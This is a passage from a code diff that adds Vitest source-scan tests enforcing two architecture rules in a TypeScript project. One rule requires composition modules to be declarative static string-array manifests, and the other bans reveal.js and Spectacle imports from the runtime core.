+// Exemption: a line-scoped `// PUL-A005-allow: <reason>` marker
+// excludes a single line. Empty / whitespace-only rationales are
+// rejected; markers hidden inside string literals are rejected.
+
+const ALLOW_TAG = 'PUL-A005-allow';
+const COMPOSITION_TYPE_NAME = 'CompositionManifest';
+
+const COMPOSITIONS_ROOT = join(SRC_ROOT, 'compositions');
+
+function isStringLikeElement(el: ts.Expression): boolean {
+  return ts.isStringLiteral(el) || ts.isNoSubstitutionTemplateLiteral(el);
+}
+
+function isAllowedTopLevelStatement(node: ts.Statement): boolean {
+  if (ts.isImportDeclaration(node)) return true;
+  if (ts.isExportDeclaration(node)) return true;
+  if (ts.isExportAssignment(node)) return true;
+  if (ts.isTypeAliasDeclaration(node)) return true;
+  if (ts.isInterfaceDeclaration(node)) return true;
+  if (ts.isVariableStatement(node)) {
+    // `const`-only: a `let` or `var` is mutable and would allow
+    // runtime reassignment of the manifest binding.
+    return (node.declarationList.flags & ts.NodeFlags.Const) !== 0;
+  }
+  return false;
+}
+
+function statementLabel(node: ts.Statement): string {
+  if (ts.isIfStatement(node)) return 'top-level if statement (imperative dispatch)';
+  if (ts.isSwitchStatement(node)) return 'top-level switch statement (imperative dispatch)';
+  if (ts.isForStatement(node) || ts.isForOfStatement(node) || ts.isForInStatement(node)) {
+    return 'top-level for loop (imperative dispatch)';
+  }
+  if (ts.isWhileStatement(node) || ts.isDoStatement(node)) {
+    return 'top-level while loop (imperative dispatch)';
+  }
+  if (ts.isFunctionDeclaration(node)) {
+    return 'top-level function declaration (imperative dispatch)';
+  }
+  if (ts.isClassDeclaration(node)) {
+    return 'top-level class declaration (imperative dispatch)';
+  }
+  if (ts.isExpressionStatement(node)) {
+    return 'top-level expression statement (imperative dispatch)';
+  }
+  if (ts.isVariableStatement(node)) {
+    return 'top-level mutable variable statement (imperative dispatch)';
+  }
+  return 'top-level statement is not a declarative form';
+}
+
+function scanForA005(source: string, file: string): readonly SourceFinding[] {
+  const sf = parseSource(source, file);
+  const exempted = collectLineExemptions(sf, ALLOW_TAG);
+  const findings: SourceFinding[] = [];
+
+  const record = (node: ts.Node, label: string): void => {
+    const start = node.getStart(sf);
+    const { line } = sf.getLineAndCharacterOfPosition(start);
+    if (exempted.has(line)) return;
+    findings.push({
+      file,
+      line: line + 1,
+      text: lineText(sf, line).trim(),
+      label,
+    });
+  };
+
+  // Symbol-aware: every `import type { CompositionManifest as Local }`
+  // (and the un-aliased form) widens the set of names the manifest
+  // scan recognises. Without this step a contributor could write
+  //   import type { CompositionManifest as Manifest } from '...';
+  //   export const x: Manifest = buildManifest();
+  // and slip imperative dispatch past the gate.
+  const manifestTypeNames = collectCompositionManifestLocalNames(sf);
+  const isManifestTypeRef = (type: ts.TypeNode | undefined): boolean =>
+    isCompositionManifestTypeRef(type, manifestTypeNames);
+  const unwrapAssertedManifestExpr = (expr: ts.Expression): ts.Expression | null =>
+    unwrapAssertedManifest(expr, manifestTypeNames);
+
+  // 1. Top-level statement shape.
+  for (const stmt of sf.statements) {
+    if (!isAllowedTopLevelStatement(stmt)) {
+      record(stmt, statementLabel(stmt));
+    }
+  }
+
+  // First pass — collect the set of names that are exported from this
+  // module. A binding can be exported either inline (`export const x
+  // = ...`) or via a later re-export (`const x = ...; export { x };`).
+  // Both routes turn `x` into a public composition surface, so the
+  // shape check has to follow both.
+  const exportedNames = collectExportedNames(sf);
+
+  // 2. Every CompositionManifest-typed binding must be a static array
+  //    literal of string-like elements. We recognise six surface
+  //    shapes — all of them produce a `CompositionManifest` value:
+  //
+  //      a) `export const m: CompositionManifest = [...]`
+  //         (variable declaration with explicit type annotation)
+  //      b) `export const m = [...] as CompositionManifest`
+  //         (as-expression with the target type)
+  //      c) `export const m = [...] satisfies CompositionManifest`
+  //         (satisfies-expression with the target type)
+  //      d) `export default ([...] as|satisfies CompositionManifest)`
+  //         (default export carrying one of the above shapes)
+  //      e) `export default <any-expression>` (no assertion)
+  //         A composition module's default export is implicitly the
+  //         composition manifest. Without a type assertion there's no
+  //         declared annotation to read, but the file is still under
+  //         `src/compositions/**/*.ts` and the export still becomes
+  //         the registered manifest. We enforce the same static-array
+  //         rule so `export default buildManifest();` is caught.
+  //      f) `export const m = <init>` (untyped, no assertion) AND
+  //         `const m = <init>; export { m };` — every other named
+  //         export from a composition module. The initializer must be
+  //         a "declarative composition surface": a primitive literal
+  //         (kept as a scene-id constant such as
+  //         `DEFAULT_COMPOSITION_ID = 'default'`) or a static array
+  //         literal of string literals. A function call, conditional,
+  //         identifier-only reference, or other dynamic shape is
+  //         imperative dispatch in disguise and is forbidden.
+  for (const stmt of sf.statements) {
+    if (ts.isVariableStatement(stmt)) {
+      for (const decl of stmt.declarationList.declarations) {
+        const init = decl.initializer;
+        if (isManifestTypeRef(decl.type)) {
+          if (!init) {
+            record(decl, `${COMPOSITION_TYPE_NAME} export has no initializer`);
+            continue;
+          }
+          checkManifestInitializer(init, record);
+          continue;
+        }
+        // Shapes (b) / (c): initializer carries the assertion itself.
+        const asserted = init && unwrapAssertedManifestExpr(init);
+        if (asserted) {
+          checkManifestInitializer(asserted, record);
+          continue;
+        }
+        // Shape (f): untyped named export. Apply the declarative-
+        // composition rule only to bindings that are actually
+        // exported from the module — a module-local helper that is
+        // never exposed is allowed to be a function call or other
+        // computed value (it does not become part of the public
+        // composition surface).
+        if (!ts.isIdentifier(decl.name)) continue;
+        if (!exportedNames.has(decl.name.text)) continue;
+        if (!init) continue; // `let x;` won't pass the top-level statement check.
+        checkUntypedComposedExport(init, record);
+      }
+    } else if (ts.isExportAssignment(stmt)) {
+      // Default exports in a composition module are the composition
+      // manifest by convention. Validate the underlying expression
+      // (stripped of any `as|satisfies` type assertion) against the
+      // same static-array rule. This closes the no-assertion default
+      // export bypass and keeps the explicit-assertion case behaving
+      // identically.
+      const inner = unwrapAssertedManifestExpr(stmt.expression) ?? stmt.expression;
+      checkManifestInitializer(inner, record);
+    }
+  }
+
+  return findings;
+}
+
+/**
+ * Collect every name that this composition module exports. Tracks two
+ * shapes:
+ *   - `export const x = ...`, `export function f() { ... }`, etc. —
+ *     statements that carry an `export` modifier directly on the
+ *     declaration. Inline-exported bindings.
+ *   - `export { x, y as z }` — a standalone `export` declaration
+ *     whose specifiers name local bindings (or rename them).
+ *
+ * Re-exports of imports (`export { x } from '...'`) are intentionally
+ * out of scope: the binding originates in another module, so the
+ * receiving module is not authoring the manifest shape itself.
+ */
+function collectExportedNames(sf: ts.SourceFile): ReadonlySet<string> {
+  const out = new Set<string>();
+  for (const stmt of sf.statements) {
+    const modifiers = ts.canHaveModifiers(stmt) ? ts.getModifiers(stmt) : undefined;
+    const hasExport = modifiers?.some((m) => m.kind === ts.SyntaxKind.ExportKeyword) ?? false;
+    if (hasExport && ts.isVariableStatement(stmt)) {
+      for (const decl of stmt.declarationList.declarations) {
+        if (ts.isIdentifier(decl.name)) out.add(decl.name.text);
+      }
+    }
+    if (ts.isExportDeclaration(stmt) && !stmt.moduleSpecifier && stmt.exportClause) {
+      if (ts.isNamedExports(stmt.exportClause)) {
+        for (const spec of stmt.exportClause.elements) {
+          // `export { x }` → name `x`; `export { x as y }` → still
+          // surfaces `x` from the local module under a new external
+          // name. The local binding being exposed is `propertyName ??
+          // name` (the *local* identifier in TypeScript's export
+          // grammar).
+          const local = spec.propertyName?.text ?? spec.name.text;
+          out.add(local);
+        }
+      }
+    }
+  }
+  return out;
+}
+
+/**
+ * Validate an untyped named composition export's initializer against
+ * the declarative-composition contract:
+ *
+ * - A primitive literal (string, number, boolean, null, undefined,
+ *   bigint) is allowed — that's how `DEFAULT_COMPOSITION_ID =
+ *   'default'` is expressed.
+ * - A static array literal of string-like elements is allowed — that
+ *   is the canonical manifest shape.
+ * - Anything else (function call, conditional expression, identifier
+ *   reference, binary expression, etc.) is imperative dispatch in
+ *   disguise and is forbidden. The line-scoped exemption marker is
+ *   the documented escape hatch.
+ */
+function checkUntypedComposedExport(
+  init: ts.Expression,
+  record: (node: ts.Node, label: string) => void,
+): void {
+  if (isPrimitiveLiteral(init)) return;
+  if (ts.isArrayLiteralExpression(init)) {
+    for (const el of init.elements) {
+      if (!isStringLikeElement(el)) {
+        record(
+          el,
+          `${COMPOSITION_TYPE_NAME} export element is not a string literal (imperative dispatch)`,
+        );
+      }
+    }
+    return;
+  }
+  record(
+    init,
+    'untyped composition export initializer is not a primitive literal or static array literal',
+  );
+}
+
+function isPrimitiveLiteral(expr: ts.Expression): boolean {
+  if (ts.isStringLiteral(expr) || ts.isNoSubstitutionTemplateLiteral(expr)) return true;
+  if (ts.isNumericLiteral(expr) || ts.isBigIntLiteral(expr)) return true;
+  if (expr.kind === ts.SyntaxKind.TrueKeyword) return true;
+  if (expr.kind === ts.SyntaxKind.FalseKeyword) return true;
+  if (expr.kind === ts.SyntaxKind.NullKeyword) return true;
+  // `undefined` is technically a value-position identifier read, not a
+  // keyword; allow it explicitly.
+  if (ts.isIdentifier(expr) && expr.text === 'undefined') return true;
+  return false;
+}
+
+/**
+ * Walk the file's top-level `import` statements and return the set of
+ * local names that resolve to the `CompositionManifest` type. Tracks
+ * the un-aliased form (`import type { CompositionManifest } from ...`)
+ * and the `as` alias form (`import type { CompositionManifest as
+ * Manifest } from ...`). Value imports of the same name are also
+ * tracked because TypeScript's `isolatedDeclarations` setting allows a
+ * non-type-only import to satisfy a type position too. The canonical
+ * name is always included so direct `CompositionManifest` references
+ * keep working even when no import statement is present (e.g., in the
+ * scanner's own self-tests).
+ */
+function collectCompositionManifestLocalNames(sf: ts.SourceFile): ReadonlySet<string> {
+  const out = new Set<string>([COMPOSITION_TYPE_NAME]);
+  for (const stmt of sf.statements) {
+    if (!ts.isImportDeclaration(stmt)) continue;
+    const clause = stmt.importClause;
+    if (!clause) continue;
+    const bindings = clause.namedBindings;
+    if (!bindings || !ts.isNamedImports(bindings)) continue;
+    for (const spec of bindings.elements) {
+      // `import { CompositionManifest }`              → propertyName undefined, name=CompositionManifest
+      // `import { CompositionManifest as Manifest }` → propertyName=CompositionManifest, name=Manifest
+      const exported = spec.propertyName?.text ?? spec.name.text;
+      if (exported === COMPOSITION_TYPE_NAME) {
+        out.add(spec.name.text);
+      }
+    }
+  }
+  return out;
+}
+
+/**
+ * True when `node` is a `TypeReferenceNode` whose `typeName` is one of
+ * the file-local names that resolves to `CompositionManifest`. The
+ * canonical name is always recognised; aliases (`CompositionManifest
+ * as Manifest`) are picked up via `collectCompositionManifestLocalNames`.
+ *
+ * Qualified type references (e.g., `Composition.Manifest`) are NOT
+ * recognised by this textual check. The composition modules in the
+ * repo do not use qualified type references, and the
+ * `composition-modules-import-CompositionManifest-by-name` self-test
+ * documents the constraint explicitly so a future contributor sees
+ * the requirement.
+ */
+function isCompositionManifestTypeRef(
+  node: ts.TypeNode | undefined,
+  localNames: ReadonlySet<string>,
+): boolean {
+  if (!node) return false;
+  if (!ts.isTypeReferenceNode(node)) return false;
+  const name = node.typeName;
+  return ts.isIdentifier(name) && localNames.has(name.text);
+}
+
+/**
+ * If `expr` (or an immediate parenthesized wrapper of it) is an
+ * `AsExpression` or `SatisfiesExpression` whose target type is one of
+ * the recognised manifest type names, return the underlying expression
+ * that should be checked for the manifest shape. Otherwise return
+ * `null`.
+ */
+function unwrapAssertedManifest(
+  expr: ts.Expression,
+  localNames: ReadonlySet<string>,
+): ts.Expression | null {
+  let current: ts.Expression = expr;
+  while (ts.isParenthesizedExpression(current)) {
+    current = current.expression;
+  }
+  if (ts.isAsExpression(current) || ts.isSatisfiesExpression(current)) {
+    if (isCompositionManifestTypeRef(current.type, localNames)) {
+      return current.expression;
+    }
+  }
+  return null;
+}
+
+function checkManifestInitializer(
+  init: ts.Expression,
+  record: (node: ts.Node, label: string) => void,
+): void {
+  if (!ts.isArrayLiteralExpression(init)) {
+    record(init, `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`);
+    return;
+  }
+  for (const el of init.elements) {
+    if (!isStringLikeElement(el)) {
+      record(
+        el,
+        `${COMPOSITION_TYPE_NAME} export element is not a string literal (imperative dispatch)`,
+      );
+    }
+  }
+}
+
+describe('PUL-A005 — composition is declarative (source scan)', () => {
+  describe('scanner self-tests — manifest shape', () => {
+    it('accepts a static array literal of string literals', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "export const myComp: CompositionManifest = ['a', 'b', 'c'];",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('flags a conditional-expression initializer', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const isProd: boolean;',
+        "export const myComp: CompositionManifest = isProd ? ['a'] : ['b'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('flags a function-call initializer', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => CompositionManifest;',
+        'export const myComp: CompositionManifest = buildManifest();',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('flags an identifier-reference initializer', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "const SCENES: CompositionManifest = ['a'];",
+        'export const myComp: CompositionManifest = SCENES;',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('flags a non-string-literal array element (computed value)', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const SCENE_ID: string;',
+        "export const myComp: CompositionManifest = [SCENE_ID, 'b'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export element is not a string literal (imperative dispatch)`,
+      );
+    });
+
+    it('flags a spread-expression element', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const rest: readonly string[];',
+        "export const myComp: CompositionManifest = ['a', ...rest];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export element is not a string literal (imperative dispatch)`,
+      );
+    });
+
+    it('accepts a no-substitution template literal element', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'export const myComp: CompositionManifest = [`a`, `b`];',
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('flags a tagged- or substituted-template-literal element', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const x: string;',
+        'export const myComp: CompositionManifest = [`a-${x}`];',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export element is not a string literal (imperative dispatch)`,
+      );
+    });
+
+    it('flags a non-static-array initializer asserted with `satisfies CompositionManifest`', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => readonly string[];',
+        'export const myComp = buildManifest() satisfies CompositionManifest;',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('flags a non-static-array initializer asserted with `as CompositionManifest`', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => readonly string[];',
+        'export const myComp = buildManifest() as CompositionManifest;',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('flags an `export default` carrying `as CompositionManifest` over a non-static initializer', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => readonly string[];',
+        'export default buildManifest() as CompositionManifest;',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('flags an `export default` carrying `satisfies CompositionManifest` over a non-static initializer', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => readonly string[];',
+        'export default buildManifest() satisfies CompositionManifest;',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('accepts `as CompositionManifest` over a static array literal', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "export const myComp = ['a', 'b'] as CompositionManifest;",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('accepts `satisfies CompositionManifest` over a static array literal', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "export const myComp = ['a', 'b'] satisfies CompositionManifest;",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('flags a non-string element inside an `as CompositionManifest` array literal', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const x: string;',
+        "export const myComp = ['a', x] as CompositionManifest;",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export element is not a string literal (imperative dispatch)`,
+      );
+    });
+
+    it('flags an untyped `export default <function call>` (no assertion)', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => CompositionManifest;',
+        'export default buildManifest();',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('flags an untyped `export default <conditional>` (no assertion)', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const flag: boolean;',
+        "export default flag ? ['a'] : ['b'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('accepts an `export default` of a static array literal (no assertion)', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "export default ['a', 'b'] satisfies CompositionManifest;",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('flags a non-string element inside an `export default` array literal', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const x: string;',
+        "export default ['a', x] satisfies CompositionManifest;",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export element is not a string literal (imperative dispatch)`,
+      );
+    });
+
+    it('recognises a `CompositionManifest as Manifest` alias and validates against it', () => {
+      const src = [
+        "import type { CompositionManifest as Manifest } from '../runtime/composition';",
+        'declare const buildManifest: () => Manifest;',
+        'export const myComp: Manifest = buildManifest();',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('recognises a `CompositionManifest as Manifest` alias in `as` assertions too', () => {
+      const src = [
+        "import type { CompositionManifest as Manifest } from '../runtime/composition';",
+        'declare const buildManifest: () => readonly string[];',
+        'export const myComp = buildManifest() as Manifest;',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        `${COMPOSITION_TYPE_NAME} export initializer is not a static array literal`,
+      );
+    });
+
+    it('accepts a `CompositionManifest as Manifest` aliased static manifest', () => {
+      const src = [
+        "import type { CompositionManifest as Manifest } from '../runtime/composition';",
+        "export const myComp: Manifest = ['a', 'b'];",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('flags an untyped named export whose initializer is a function call', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => CompositionManifest;',
+        'export const deck = buildManifest();',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'untyped composition export initializer is not a primitive literal or static array literal',
+      );
+    });
+
+    it('flags an untyped named export whose initializer is a conditional expression', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const flag: boolean;',
+        "export const deck = flag ? ['a'] : ['b'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'untyped composition export initializer is not a primitive literal or static array literal',
+      );
+    });
+
+    it('flags an untyped re-export (`const x = ...; export { x };`) whose initializer is a function call', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const buildManifest: () => CompositionManifest;',
+        'const deck = buildManifest();',
+        'export { deck };',
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'untyped composition export initializer is not a primitive literal or static array literal',
+      );
+    });
+
+    it("accepts an untyped scene-id constant export (`export const ID = 'foo'`)", () => {
+      // `DEFAULT_COMPOSITION_ID = 'default'` in the real `default.ts`
+      // is the canonical example. Primitive-literal initializers are
+      // allowed because they cannot encode imperative dispatch.
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "export const DEFAULT_COMPOSITION_ID = 'default';",
+        "export const defaultComposition: CompositionManifest = ['placeholder'];",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('accepts an untyped named export whose initializer is a static array of string literals', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "export const deck = ['a', 'b', 'c'];",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+
+    it('does NOT flag a module-local non-exported `const helper = <call>()`', () => {
+      // A binding that never leaves the module cannot be the source of
+      // truth for a composition's order. Imperative module-local
+      // helpers are NOT what PUL-A005 forbids.
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const f: () => string;',
+        'const helper = f();',
+        "export const deck: CompositionManifest = ['a', 'b'];",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+  });
+
+  describe('scanner self-tests — top-level statement shape', () => {
+    it('flags a top-level `if` statement', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const flag: boolean;',
+        'if (flag) {',
+        "  console.log('dispatch');",
+        '}',
+        "export const myComp: CompositionManifest = ['a'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'top-level if statement (imperative dispatch)',
+      );
+    });
+
+    it('flags a top-level `switch` statement', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const v: number;',
+        'switch (v) { case 0: break; default: break; }',
+        "export const myComp: CompositionManifest = ['a'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'top-level switch statement (imperative dispatch)',
+      );
+    });
+
+    it('flags a top-level `for` loop', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'for (let i = 0; i < 1; i++) {}',
+        "export const myComp: CompositionManifest = ['a'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain('top-level for loop (imperative dispatch)');
+    });
+
+    it('flags a top-level function declaration', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "function helper(): string { return 'a'; }",
+        "export const myComp: CompositionManifest = ['a'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'top-level function declaration (imperative dispatch)',
+      );
+    });
+
+    it('flags a top-level `let` declaration', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'let mutableState = 0;',
+        "export const myComp: CompositionManifest = ['a'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'top-level mutable variable statement (imperative dispatch)',
+      );
+    });
+
+    it('flags a top-level expression statement', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        "console.log('side effect');",
+        "export const myComp: CompositionManifest = ['a'];",
+      ].join('\n');
+      const findings = scanForA005(src, 'src/compositions/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'top-level expression statement (imperative dispatch)',
+      );
+    });
+
+    it('accepts a top-level type alias and interface declaration', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'type AdditionalProps = { tag: string };',
+        'interface Hook { onLoad(): void }',
+        "export const myComp: CompositionManifest = ['a'];",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+  });
+
+  describe('scanner self-tests — exemption', () => {
+    it('honors `// PUL-A005-allow: <reason>` on the violating line', () => {
+      const src = [
+        "import type { CompositionManifest } from '../runtime/composition';",
+        'declare const flag: boolean;',
+        "export const myComp: CompositionManifest = flag ? ['a'] : ['b']; // PUL-A005-allow: legacy bridge, see ADR-XYZ",
+      ].join('\n');
+      expect(scanForA005(src, 'src/compositions/x.ts')).toEqual([]);
+    });
+  });
+
+  describe('runtime tree (current code revision)', () => {
+    it('compositions root `src/compositions/` exists and contains at least one .ts file', () => {
+      expect(statSync(COMPOSITIONS_ROOT).isDirectory()).toBe(true);
+      expect(walkTsFiles(COMPOSITIONS_ROOT).length).toBeGreaterThan(0);
+    });
+
+    it('contains no A005 violations across `src/compositions/**/*.ts`', () => {
+      const files = walkTsFiles(COMPOSITIONS_ROOT);
+      const findings: SourceFinding[] = [];
+      for (const file of files) {
+        const text = readFileSync(file, 'utf-8');
+        const rel = relative(REPO_ROOT, file);
+        findings.push(...scanForA005(text, rel));
+      }
+      const header =
+        'PUL-A005 forbids imperative dispatch as the source of truth for composition order. Compositions must be declarative manifests (static arrays of string-literal scene ids). Add a `// PUL-A005-allow: <reason>` exemption on the same line if the use is intentional.';
+      const detail = findings.map((f) => `  ${f.file}:${f.line}  ${f.label}  ${f.text}`).join('\n');
+      const message = findings.length === 0 ? '' : `${header}\n${detail}`;
+      expect(findings, message).toEqual([]);
+    });
+  });
+});

--- a/tests/runtime/policy-a006-slide-frameworks.test.ts
+++ b/tests/runtime/policy-a006-slide-frameworks.test.ts
@@ -1,0 +1,101 @@
+import { readFileSync } from 'node:fs';
+import { join, relative } from 'node:path';
+import { describe, expect, it } from 'vitest';
+
+import {
+  type ImportBanRule,
+  REPO_ROOT,
+  SRC_ROOT,
+  type SourceFinding,
+  collectLineExemptions,
+  parseSource,
+  scanImportSpecifiers,
+  walkTsFiles,
+} from './source-policy';
+
+// PUL-A006 — Live runtime is independent of slide frameworks.
+//
+// Statement: "The runtime core SHALL NOT import or depend on
+// slide-framework primitives (e.g., reveal.js or Spectacle). Slide
+// frameworks MAY be used in companion projects, separate from the
+// runtime core."
+//
+// Enforcement: a Vitest source scan over the runtime-core file set
+// (everything under `src/` EXCEPT `src/scenes/**`) that flags any
+// import of reveal.js, Spectacle, or their scoped subpackages.
+
+const RULE: ImportBanRule = {
+  label: 'slide framework imported by runtime core',
+  specifiers: ['reveal.js', 'reveal.js/', 'spectacle', 'spectacle/', '@spectacle/'],
+  boundaries: [],
+  allowTag: 'PUL-A006-allow',
+};
+
+const SCENES_ROOT = join(SRC_ROOT, 'scenes');
+
+function runtimeCoreFiles(): readonly string[] {
+  return walkTsFiles(SRC_ROOT).filter((file) => !file.startsWith(`${SCENES_ROOT}/`));
+}
+
+function scanForA006(source: string, file: string): readonly SourceFinding[] {
+  const sf = parseSource(source, file);
+  const exempted = collectLineExemptions(sf, RULE.allowTag);
+  return scanImportSpecifiers(sf, RULE, exempted);
+}
+
+describe('PUL-A006 — live runtime independent of slide frameworks (source scan)', () => {
+  describe('scanner self-tests', () => {
+    it.each([
+      ["import Reveal from 'reveal.js';"],
+      ["import 'reveal.js/dist/reveal.css';"],
+      ["import { Deck, Slide } from 'spectacle';"],
+      ["import * as Spectacle from 'spectacle';"],
+      ["import { Theme } from '@spectacle/theme';"],
+      ["await import('reveal.js');"],
+      ["import type { Options } from 'reveal.js';"],
+      ["export * from 'spectacle';"],
+    ])('flags %s in runtime core', (source) => {
+      const findings = scanForA006(source, 'src/runtime/example.ts');
+      expect(findings).toHaveLength(1);
+    });
+
+    it('does NOT flag a similarly-named package (whole-specifier match)', () => {
+      const src = "import { thing } from 'reveal.js-toolbelt';";
+      expect(scanForA006(src, 'src/runtime/example.ts')).toEqual([]);
+    });
+
+    it('does NOT flag a `spectacle` substring in an unrelated specifier', () => {
